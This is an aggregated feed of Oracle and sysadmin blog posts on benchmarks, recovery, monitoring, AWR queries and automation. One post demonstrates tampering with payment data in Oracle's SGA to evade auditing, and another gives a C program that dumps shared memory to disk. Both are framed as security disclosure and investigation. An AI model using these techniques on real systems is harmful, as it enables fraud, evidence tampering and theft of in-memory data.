Under Azure, we simply aren’t getting a full physical core’s worth of throughput. Perhaps the hypervisor is capping throughput, and capping even lower for basic instances? Or maybe the actual CPU is different than the E5-2660 reported? For integer CPU-bound workloads like our gzip test, we would need to purchase at least twice as much capacity under Azure than AWS, making Azure considerably more expensive as a platform.

Categories: DBA Blogs

Direct update of Oracle data in SGA to avoid audit.

ContractOracle - Thu, 2014-07-10 04:42
Vendors sell some rather expensive software for auditing Oracle databases, and for coding applications to ensure an audit trail, but the truth is that anyone logged into the database server as the owner of the database can directly modify data in the datafiles, or even in memory.

I previously demonstrated using BBED to update blocks in datafiles, but it was necessary to update block checksums and flush the buffer cache to activate the changes.  Modifying data in SGA directly is easier, and leaves less evidence.  
It seems that once data is read into the SGA, Oracle does not use checksums to look for corruption, and it is also possible to modify uncommitted data.  I have written a simple C program to update SGA directly.
Here is one example demonstrating how even uncommitted data can be updated in the SGA.  The same thing can be done to any data in the SGA, including password hashes, credit card numbers, email addresses etc.
PDB1@ORCL> create table payment_batch (payee char(6));

Table created.

PDB1@ORCL> insert into payment_batch values ('vendor');

1 row created.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy

PDB1@ORCL> commit;

Commit complete.

PDB1@ORCL> alter system flush buffer_cache;

System altered.

PDB1@ORCL> select * from payment_batch;

PAYEE
------
badguy
You can see that in the middle of this transaction it was possible to modify the in-flight data stored in SGA, which was then committed to disk.  This was done via a direct update to SGA records on the DB server.
Categories: DBA Blogs

12c Index Like Table Statistics Collection (Wearing The Inside Out)

Richard Foote - Wed, 2014-07-09 02:14
This change introduced in 12c has caught me out on a number of occasions. If you were to create a new table: And then populate it with a conventional insert: We find there are no statistics associated with the table until we explicitly collect them: But if we were to now create an index on this […]
Categories: DBA Blogs

Used Delphix to quickly recover ten production tables

Bobby Durrett's DBA Blog - Tue, 2014-07-08 10:24

Yesterday I used Delphix to quickly recover ten production tables that had accidentally been emptied over the weekend.  We knew that at a certain time on Saturday the tables were fully populated and that after that some batch processing wrecked them, so we created a new virtual database which was a clone of production as of the date and time just before the problem occurred.  We could have accomplished the same task using RMAN to clone production but Delphix spun up the new copy more quickly than RMAN would have.

The source database is 5.4 terabytes and there were about 50 gigabytes of archive logs that we needed to apply to recover to the needed date and time.  It took about 15 minutes to complete the clone including applying all the redo.  The resulting database occupies only 10 gigabytes of disk storage.

If we had used RMAN we would first have to add more disk storage because we don’t have a system with enough free to hold a copy of the needed tablespaces.  Then, after waiting for our storage and Unix teams to add the needed storage we would have to do the restore and recovery.  All these manual steps take time and are prone to human error, but the Delphix system is point and click and done through a graphical user interface (GUI).

Lastly, during the recovery we ran into Oracle bug 7373196 which caused our first attempted recovery to fail with an ORA-00600 [krr_init_lbufs_1] error.  After researching this bug I had to rerun the restore and recovery with the parameter _max_io_size set to 33554432, which is the workaround for the bug.  Had we been using RMAN we probably would have had to run the recovery at least twice to resolve this bug.  Maybe we could have started at the point it failed but I’m not sure.  With Delphix it was just a matter of setting the _max_io_size parameter and starting from scratch since I knew the process only took 15 minutes.  Actually it took me two or three attempts to figure out how to set the parameter, but once I figured it out it was so simple I’m not sure why I didn’t do it right the first time.  So, at the end of the day it was just under 3 hours from my first contact about this issue until they had the database up and were able to funnel off the data they needed to resolve the production issue.  Had I been doing an RMAN recovery I don’t doubt that I would have worked late into the night yesterday accomplishing the same thing.
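
The post doesn’t show exactly how the parameter was entered for the Delphix clone, but for reference, on a plain Oracle instance a hidden parameter like this would typically be set along the lines of the sketch below (note the double quotes required for underscore parameters); this is only an illustration of the workaround, not Delphix-specific syntax:

-- workaround for bug 7373196, applied before re-running the recovery
alter system set "_max_io_size" = 33554432 scope=spfile;
-- then restart the instance so the new value takes effect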

- Bobby

P.S. These databases are on HP-UX 11.31 on IA64, Oracle version 11.1.0.7.0.

 

 

Categories: DBA Blogs

Passed the 11g RAC and Grid Expert Exam

Hemant K Chitale - Tue, 2014-07-08 09:08
I passed the 11g RAC and Grid Expert Exam yesterday.
.
For those who are interested :

You must absolutely read the documentation on ASM, Grid Infrastructure and RAC. 

I also recommend 3 books 
1) Pro Oracle Database 11g RAC on Linux -- by Steve Shaw and Martin Bach [Apress Publishing]
2) Oracle 11g R1/R2 Real Application Clusters Essentials -- by Ben Prusinsky and Syed Jaffer Hussain [Packt Publishing] 
OR 
2) Oracle 11g R1/R2 Real Application Clusters Handbook -- by Ben Prusinsky, Guenad Jilveski and Syed Jaffer Hussain [Packt Publishing] 
3) Oracle Database 11g Release 2 High Availability -- by Scott Jesse, Bill Burton and Bryan Vongray [Oracle Press] 

The 11gR2 Grid and RAC Accelerated training at Oracle University is also recommended but expensive.
.
.
.
Categories: DBA Blogs

Making it Easier to Graph Your Infrastructure’s Performance Data

Pythian Group - Tue, 2014-07-08 07:46

Today I would like to share a story with you about the development of a Puppet module for Grafana and its release on the Puppet Forge. But first, I’d like to provide some context so you can understand where Grafana fits in and why I feel this is important.

Those of you that know me have likely heard me talk about the importance of data-driven decision making, and more specifically some of the tools that can be used to help enable individuals to make smart decisions about their IT infrastructure. A common approach is to deploy a graphing system such as Graphite, which stores performance data about your infrastructure to aid you in performing a number of functions including problem diagnosis, performance trending, capacity planning, and data analytics.

If you are unfamiliar with the software, I’ll briefly describe its architecture. Graphite consists of a daemon, called carbon, which listens for time series data and writes it to a fixed-size database called whisper. It also provides a web application to expose the data and allow the user to create and display graphs on demand using a powerful API.

While Graphite does a good job of storing time series data and providing a rich API for visualizing it, one of the things it does not really focus on is providing a dashboard for the data. Thankfully we have Grafana to fill this role and it happens to do it quite well.

If you have ever worked with the ELK stack (Elasticsearch, Logstash, and Kibana) before, Grafana’s interface should be familiar to you, as it is based on Kibana. It is a frontend for Graphite or InfluxDB, and runs as a client side application in your browser. Its only (optional) external dependency is Elasticsearch, as it can use it to store, load and search for dashboards.

Below are some of Grafana’s most notable features (see its feature highlights for a more comprehensive list):

  • Dashboard search
  • Templated dashboards
  • Save / load from Elasticsearch and / or JSON file
  • Quickly add functions (search, typeahead)
  • Direct link to Graphite function documentation
  • Graph annotation
  • Multiple Graphite or InfluxDB data sources
  • Ability to switch between data sources
  • Show graphs from different data sources on the same dashboard

We like to make use of IT automation software whenever possible to deploy tools for our clients. Most tools already have Puppet modules or Chef cookbooks available for them, including the other components of the graphing system: Graphite itself, and a great Python-based collector named Diamond. Grafana, however, had no Puppet module available so I decided to rectify the situation by creating one and publishing it to the Puppet Forge.

The module would be pretty simple: all that is required is to download and extract Grafana into an installation directory, and ensure appropriate values for the Elasticsearch, Graphite and InfluxDB servers / data sources are inserted into its configuration.

I decided to offload the work of downloading and extracting the software to another module, namely gini/archive. And managing the configuration file, config.js, would be done with a combination of module parameters and an ERB template.

The only real complication arose when it came time to test serving Grafana with a web server such as Apache or Nginx. I decided not to have my module manage the web server in any way, so I would leverage Puppet Labs’ own Apache module for this purpose.

My test environment consisted of a CentOS virtual machine provisioned by Vagrant and Puppet, with Graphite and Grafana on the same server. I decided to use Daniel Werdermann’s module to deploy Graphite on my virtual machine as it had worked well for me in the past.

I quickly ran into problems with duplicate resources, however, due to the Graphite module managing Apache for creation of its virtual host etc. I moved to separate virtual machines for Graphite and Grafana, and that made my life easier. If you do decide to run both pieces of software on the same server, and are also using Daniel’s module, you can work around the problem by setting gr_web_server to ‘none’ like this:

class { 'graphite':
  gr_web_server			=> 'none',
  gr_web_cors_allow_from_all	=> true,
}

Since my module does not manage Apache (or Nginx), it is necessary to add something like the following to your node’s manifest to create a virtual host for Grafana:

# Grafana is to be served by Apache
class { 'apache':
  default_vhost   => false,
}

# Create Apache virtual host
apache::vhost { 'grafana.example.com':
  servername      => 'grafana.example.com',
  port            => 80,
  docroot         => '/opt/grafana',
  error_log_file  => 'grafana-error.log',
  access_log_file => 'grafana-access.log',
  directories     => [
    {
      path            => '/opt/grafana',
      options         => [ 'None' ],
      allow           => 'from All',
      allow_override  => [ 'None' ],
      order           => 'Allow,Deny',
    }
  ]
}

And the Grafana declaration itself:

class { 'grafana':
  elasticsearch_host  => 'elasticsearch.example.com',
  graphite_host       => 'graphite.example.com',
}

Now that my module was working, it was time to publish it to the Puppet Forge. I converted my Modulefile to metadata.json, added a .travis.yml file to my repository and enabled integration with Travis CI, built the module and uploaded it to the Forge.

Since its initial release, I have updated the module to deploy Grafana version 1.6.1 by default, including updating the content of the config.js ERB template, and have added support for InfluxDB. I am pretty happy with the module and hope that you find it useful.

I do have plans to add more capabilities to the module, including support of more of Grafana’s configuration file settings, having the module manage the web server’s configuration similar to how Daniel’s module does it, and adding a stronger test suite so I can ensure compatibility with more operating systems and Ruby / Puppet combinations.

I welcome any questions, suggestions, bug reports and / or pull requests you may have. Thanks for your time and interest!

Project page: https://github.com/bfraser/puppet-grafana
Puppet Forge URL: https://forge.puppetlabs.com/bfraser/grafana

Categories: DBA Blogs

C program to dump shared memory segments to disk on Linux.

ContractOracle - Tue, 2014-07-08 01:26
The following program was written to help investigate Oracle database shared memory on Linux.  It dumps the contents of existing shared memory segments to files on disk.  Note that it won't work against Oracle 11g and 12C databases as they use mmap instead of shmat for managing shared memory.  Sample program for reading from 11g and 12C here (mmap example )

Compile it using "gcc -o shared shared.c"  It is free for anyone to copy or modify as they wish, but I do not guarantee the functionality.
Check the format of the include listings below in case blogger has stripped any hashes or greater-than/less-than symbols.

#include <stdio.h>
#include <stdlib.h>
#include <sys/shm.h>

int main (int argc, char *argv[]) {
    int maxkey, id, shmid = 0;
    struct shm_info shm_info;
    struct shmid_ds shmds;
    void *shared_data;
    FILE *outfile;

    maxkey = shmctl(0, SHM_INFO, (void *) &shm_info);
    for (id = 0; id <= maxkey; id++) {
        shmid = shmctl(id, SHM_STAT, &shmds);
        char shmidchar[16];
        snprintf(shmidchar, sizeof(shmidchar), "%d", shmid);
        if (shmid < 0)
            continue;
        if (shmds.shm_segsz > 0) {
            printf("Shared memory segment %s found.\n", shmidchar);

            shared_data = shmat(shmid, NULL, 0666);
            if (shared_data != (void *) -1) {   // shmat returns (void *) -1 on failure, not NULL
                outfile = fopen(shmidchar, "wb");
                if (outfile == NULL) {
                    printf("Could not open file %s for writing.", shmidchar);
                }
                else {
                    fwrite(shared_data, shmds.shm_segsz, 1, outfile);
                    fclose(outfile);

                    printf("Dumped to file %s\n\n", shmidchar);
                }
                shmdt(shared_data);             // detach from the segment before moving on
            }
        }
    }
    return 0;
}


Categories: DBA Blogs

It was 12 years ago today…

Richard Foote - Tue, 2014-07-08 01:07
It was exactly 12 years ago today that I first presented my Index Internals – Rebuilding The Truth presentation at a local ACT Oracle User Group event. And so my association with Oracle indexes started. It would be an interesting statistic to know how many people have subsequently read the presentation :) It would no doubt result in […]
Categories: DBA Blogs

Pro-active AWR Data Mining to Find Change in SQL Execution Plan

Pythian Group - Mon, 2014-07-07 11:11

Many times we have been called about the poor performance of a database, and it has been narrowed down to a SQL statement. Subsequent analysis has shown that the execution plan had changed and a wrong execution plan was being used.

The resolution, normally, is to fix the execution plan: in 11g by running

variable x number
begin
:x :=
    dbms_spm.load_plans_from_cursor_cache(
    sql_id=>'&sql_id',
    plan_hash_value=>&plan_hash,
    fixed=>'YES');
end;
/

or, for 10g, by creating a SQL_PROFILE as mentioned in Carlos Sierra’s blog.
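
For reference, the 10g approach (roughly what Carlos Sierra’s script automates) feeds the outline hints of the known-good plan to DBMS_SQLTUNE.IMPORT_SQL_PROFILE. The sketch below uses placeholder SQL text, hints and profile name; in practice the hints are extracted from the OTHER_XML column of DBA_HIST_SQL_PLAN for the desired plan_hash_value:

declare
  v_hints sys.sqlprof_attr;
begin
  -- outline hints of the good plan (placeholders shown here)
  v_hints := sys.sqlprof_attr(
      'BEGIN_OUTLINE_DATA',
      'FULL(@"SEL$1" "T"@"SEL$1")',
      'END_OUTLINE_DATA');

  dbms_sqltune.import_sql_profile(
      sql_text    => 'select /* example */ count(*) from t',
      profile     => v_hints,
      name        => 'PROFILE_example',
      force_match => true,
      replace     => true);
end;
/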

A pro-active approach can be to mine AWR data for any SQL execution plan changes.

The following query against dba_hist_sqlstat can retrieve the list of SQL IDs whose plans have changed. It orders the SQL IDs so that those for which the maximum gains can be achieved by fixing the plan are listed first.

 
spool sql_with_more_than_1plan.txt
set lines 220 pages 9999 trimspool on
set numformat 999,999,999
column plan_hash_value format 99999999999999
column min_snap format 999999
column max_snap format 999999
column min_avg_ela format 999,999,999,999,999
column avg_ela format 999,999,999,999,999
column ela_gain format 999,999,999,999,999
select sql_id,
       min(min_snap_id) min_snap,
       max(max_snap_id) max_snap,
       max(decode(rw_num,1,plan_hash_value)) plan_hash_value,
       max(decode(rw_num,1,avg_ela)) min_avg_ela,
       avg(avg_ela) avg_ela,
       avg(avg_ela) - max(decode(rw_num,1,avg_ela)) ela_gain,
       -- max(decode(rw_num,1,avg_buffer_gets)) min_avg_buf_gets,
       -- avg(avg_buffer_gets) avg_buf_gets,
       max(decode(rw_num,1,sum_exec))-1 min_exec,
       avg(sum_exec)-1 avg_exec
from (
  select sql_id, plan_hash_value, avg_buffer_gets, avg_ela, sum_exec,
         row_number() over (partition by sql_id order by avg_ela) rw_num , min_snap_id, max_snap_id
  from
  (
    select sql_id, plan_hash_value , sum(BUFFER_GETS_DELTA)/(sum(executions_delta)+1) avg_buffer_gets,
    sum(elapsed_time_delta)/(sum(executions_delta)+1) avg_ela, sum(executions_delta)+1 sum_exec,
    min(snap_id) min_snap_id, max(snap_id) max_snap_id
    from dba_hist_sqlstat a
    where exists  (
       select sql_id from dba_hist_sqlstat b where a.sql_id = b.sql_id
         and  a.plan_hash_value != b.plan_hash_value
         and  b.plan_hash_value > 0)
    and plan_hash_value > 0
    group by sql_id, plan_hash_value
    order by sql_id, avg_ela
  )
  order by sql_id, avg_ela
  )
group by sql_id
having max(decode(rw_num,1,sum_exec)) > 1
order by 7 desc
/
spool off
clear columns
set numformat 9999999999

The sample output for this query will look like this:

SQL_ID        MIN_SNAP MAX_SNAP PLAN_HASH_VALUE          MIN_AVG_ELA              AVG_ELA             ELA_GAIN     MIN_EXEC     AVG_EXEC
------------- -------- -------- --------------- -------------------- -------------------- -------------------- ------------ ------------
ba42qdzhu5jb0    65017    67129      2819751536       11,055,899,019       90,136,403,552       79,080,504,532           12            4
2zm7y3tvqygx5    65024    67132       362220407       14,438,575,143       34,350,482,006       19,911,906,864            1            3
74j7px7k16p6q    65029    67134      1695658241       24,049,644,247       30,035,372,306        5,985,728,059           14            7
dz243qq1wft49    65030    67134      3498253836        1,703,657,774        7,249,309,870        5,545,652,097            1            2

MIN_SNAP and MAX_SNAP are the minimum/maximum snap id where the SQL statement occurs

PLAN_HASH_VALUE is the hash_value of the plan with the best elapsed time

ELA_GAIN is the estimated improvement in elapsed time by using this plan compared to the average execution time.

Using the output of the above query, SQL execution plans can be fixed after proper testing, as shown in the example below.  This method can help DBAs pinpoint and resolve problems with SQL execution plans faster.
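
For example, plugging the first row of the sample output above (sql_id ba42qdzhu5jb0, best plan hash 2819751536) into the 11g fix shown at the top of this post would look like this, assuming the desired plan is still in the cursor cache and has first been verified on a test system:

variable x number
begin
:x :=
    dbms_spm.load_plans_from_cursor_cache(
    sql_id=>'ba42qdzhu5jb0',
    plan_hash_value=>2819751536,
    fixed=>'YES');
end;
/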

Categories: DBA Blogs

Salt Stack for Remote Parallel Execution of Commands

Pythian Group - Mon, 2014-07-07 11:08

There are many scenarios when a SysAdmin has to do a “box walk” of the entire infrastructure to execute a command across many servers. This is universally accepted as one of the less glamorous parts of our job. The larger the infrastructure, the longer these box walks take, and the greater chance that human error will occur.

Even giving this task to a junior resource, as is often the case, is not sustainable as the infrastructure grows, and does not represent the best value to the business in terms of resource utilization. Additionally, too much of this type of “grind” work can demoralize even the most enthusiastic team member.

Thankfully the days of having to do these box walks are over. Thanks to configuration management and infrastructure automation tools, the task has been automated and no longer requires the investment in time by a human SysAdmin that it once did. These tools allow you, at a very high level, to off load this repetitive work to the computer, with the computer doing the heavy lifting for you.

 

Introducing Salt Stack

Salt Stack is a distributed remote execution system used to execute commands and query data on remote nodes, either individually or by arbitrary selection criteria. Salt Stack is also a configuration management system in its own right, but this post will be focusing on Salt from a “Command and Control” point of view.

Salt has 2 main components: the “salt master” (server) and the “salt minions” (clients). Once the minions are accepted by the master, further execution of commands can come directly from the central salt master server.

Once you have installed your packages the minion needs to be configured to know where its master is. This can be accomplished through a DNS or hosts-file entry or by setting the variable in the /etc/salt/minion config.


master: XXX.XXX.XXX.XXX

Where “XXX.XXX.XXX.XXX” is the IP Address of your master server. Once that is done, and the salt-minion service has been started the minion will generate and ship an SSL key back to the master to ensure all communication is secure.

The master must accept the key from the minion before any control can begin.


# Listing the Keys

[root@ip-10-154-193-216 ~]# salt-key -L
Accepted Keys:
Unaccepted Keys:
ip-10-136-76-163.ec2.internal
Rejected Keys:

# Adding The Key

[root@ip-10-154-193-216 ~]# salt-key -A
The following keys are going to be accepted:
Unaccepted Keys:
ip-10-136-76-163.ec2.internal
Proceed? [n/Y] y
Key for minion ip-10-136-76-163.ec2.internal accepted.

# Nailed It! Now the Master can control the Minion!

[root@ip-10-154-193-216 ~]# salt-key -L
Accepted Keys:
ip-10-136-76-163.ec2.internal
Unaccepted Keys:
Rejected Keys:

Note: Not Shown – I added a 2nd Minion

Now that your master has minions the fun begins. From your master you can now query information from your minions such as disk space:


[root@ip-10-154-193-216 ~]# salt '*' disk.percent

ip-10-136-76-163.ec2.internal:
----------
/:
15%
/dev/shm:
0%
ip-10-147-240-208.ec2.internal:
----------
/:
14%
/dev/shm:
0%

And you can also execute remote commands such as finding out service status, and restarting services.


[root@ip-10-154-193-216 ~]# salt '*' cmd.run "service crond status"

ip-10-136-76-163.ec2.internal:
crond (pid 1440) is running...
ip-10-147-240-208.ec2.internal:
crond (pid 1198) is running...

[root@ip-10-154-193-216 ~]# salt '*' cmd.run "service crond restart"
ip-10-136-76-163.ec2.internal:
Stopping crond: [ OK ]
Starting crond: [ OK ]
ip-10-147-240-208.ec2.internal:
Stopping crond: [ OK ]
Starting crond: [ OK ]

These are only the most basic use cases for what Salt Stack can do, but even from these examples it is clear that Salt can become a powerful tool which can reduce the potential for human error and increase the efficiency of your SysAdmin team.

By Implementing Configuration Management and Infrastructure Automation tools such as Salt Stack you can free up the time of your team members to work on higher quality work which delivers more business value.

Salt Stack (depending on your setup) can be deployed in minutes. On RHEL/CentOS/Amazon Linux using the EPEL repo, I was able to be up and running with Salt in about 5 minutes on the 3 nodes I used for the examples in this post. Salt can be deployed using another configuration management tool, it can be baked into your provisioning environment, or it can be built into base images. If all else fails, (ironically) you can do a box walk to install the package on your existing servers.

Even if you have another configuration management solution deployed, depending on what you are trying to accomplish, using Salt for parallel command execution rather than the config management system can often prove a much simpler and more lightweight solution.

Salt is also a great choice for giving other teams the ability to execute commands on a subset of boxes without requiring them to have shell access to all of the servers. This allows those teams to get their job done without the SysAdmin team becoming a bottleneck.

Categories: DBA Blogs

Log Buffer #378, A Carnival of the Vanities for DBAs

Pythian Group - Fri, 2014-07-04 08:43

New technologies, new ideas, and new tips are forthcoming in abundance in numerous blog posts across Oracle, SQL Server, and MySQL. This Log Buffer Edition covers many of the salient ones.

Oracle:

Whether you use a single OEM and are migrating to a new OEM, or have multiple OEMs, the need to move templates between environments will arise.

Oracle Coherence is the industry’s leading in-memory data grid solution that enables applications to predictably scale by providing fast, reliable and scalable access to frequently used data.

Needless to say, some ATG applications are more complex than others.  Some ATG applications support a single site, single language, single catalog, single currency, have a single development staff, single business team, and a relatively simple business model.

The purpose of this article is to describe some of the important foundational concepts of ATG.

You can use Ops Center to perform some very complex tasks. For instance, you might use it to provision several operating systems across your environment, with multiple configurations for each OS.

SQL Server:

SSRS In a Flash – Level 1 in the Stairway to Reporting Services.

The “Numbers” or “Tally” Table: What it is and how it replaces a loop.

Arshad Ali demonstrates granular level encryption in detail and explains how it differs from Transparent Data Encryption (TDE).

There were many new DMVs added in SQL Server 2012, and some that have changed since SQL Server 2008 R2.

There are some aspects of tables in SQL Server that a lot of people get wrong, purely because they seem so obvious that one feels embarrassed about asking questions.

MySQL:

A much awaited release from the MariaDB project is now stable (GA) – MariaDB Galera Cluster 10.0.12.

Failover with the MySQL Utilities: Part 2 – mysqlfailover.

HowTo: Integrating MySQL for Visual Studio with Connector/Net.

Single database backup and restore with MEB.

Externally Stored Fields in InnoDB.

Categories: DBA Blogs

Speedy #em12c template export

DBASolved - Thu, 2014-07-03 20:50

Whether you use a single OEM and are migrating to a new OEM, or have multiple OEMs, the need to move templates between environments will arise.  I had this exact problem come up recently at a customer site between an OEM 11g and OEM 12c.  In order to move the templates, I needed to export the multiple monitoring templates using EMCLI.  The command that I used to do individual exports was the following:


./emcli export_template -name="<template name>" -target_type="<target_type>" -output_file="/tmp/<template name>.xml"

If you have only one template to move, the EMCLI command above will work.  If you have more than one template to move, the easiest thing to do is to have the EMCLI command run in a script.  This is the beauty of EMCLI: the ability to interact with OEM at the command line and use it in scripts for repeated executions.  Below is a script that I wrote to export templates based on target_types.

Note: If you need to identify the target_types that are supported by OEM, they can be found in SYSMAN.EM_TARGET_TYPES in the repository.
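
If you want to check the available target types before running the script, a quick query against the repository works. This is only a sketch and the column name is an assumption, so describe the table first if your OEM release differs:

-- connect to the OMS repository database as a user with access to the SYSMAN schema
desc sysman.em_target_types

-- column name assumed to be TARGET_TYPE; adjust to whatever DESC shows
select target_type
  from sysman.em_target_types
 order by target_type;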


#!/usr/bin/perl -w
#
#Author: Bobby Curtis, Oracle ACE
#Copyright: 2014
#
use strict;
use warnings;

#Parameters
my $oem_home_bin = "/opt/oracle/app/product/12.1.0.4/middleware/oms/bin";
my @columns = ("", 0, 0, 0, 0);
my @buf;
my $target_type = $ARGV[0];

#Program

if (scalar @ARGV != 1)
{
 print "\nUsage:\n";
 print "perl ./emcli_export_templates.pl <target_type>\n\n";
 print "<target_type> = target type for template being exported\n";
 print "refer to sysman.em_target_types in repository for more info.";
 print "\n";
 exit;
}

system($oem_home_bin.'/emcli login -username=<userid> -password=<password>');
system($oem_home_bin.'/emcli sync');

@buf = `$oem_home_bin/emcli list_templates`;

foreach (@buf)
{
 @columns = split (/ {2,}/, $_);

 if ($columns[2] eq $target_type )
 {
 my $cmd = 'emcli export_template -name="'.$columns[0].'" -target_type="'.$columns[2].'" -output_file="/tmp/'.$columns[0].'.xml"';
 system($oem_home_bin.'/'.$cmd);
 print "Finished export of: $columns[0] template\n";
 }
}

system($oem_home_bin.'/emcli logout');

If you would like to learn more about EMCLI and other ways to use it have a look at these other blogs:

Ray Smith: https://oramanageability.wordpress.com/
Kellyn Pot’Vin: http://dbakevlar.com/
Seth Miller: http://sethmiller.org/

Enjoy!

twitter: @dbasolved

blog: http://dbasolved.com


Filed under: OEM
Categories: DBA Blogs

Partner Webcast - Oracle Coherence & Weblogic Server: Close Integration of Application & Data Grid Tier

Oracle Coherence is the industry’s leading in-memory data grid solution that enables applications to predictably scale by providing fast, reliable and scalable access to frequently used data. The key...

We share our skills to maximize your revenue!
Categories: DBA Blogs